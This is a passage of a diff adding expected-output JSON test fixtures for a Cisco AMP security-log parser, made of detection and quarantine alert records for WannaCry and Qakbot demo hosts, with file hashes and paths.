], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 17121, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 5748, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 667000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18745, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4772, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847656", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 28000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 20287, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 23391, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 24592, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 25793, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:09:00.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1493058569636000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T14:09:00.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30752, + "process.hash.sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 611000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 32509, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:45:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772012435046402", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 940000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772012435046000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "Unconfirmed 762952.crdownload", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34974, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 724000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36260, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741859", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 38805, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741858", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 210000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40328, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741855", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 194000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41673, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741857", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43279, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 163000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44631, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 447000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214492323807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47096, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:29:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.event_type_id": 1107296257, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 535214029, + "event.action": "Potential Dropper Infection", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945890085425, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T13:29:36.000Z", + "file.hash.sha256": 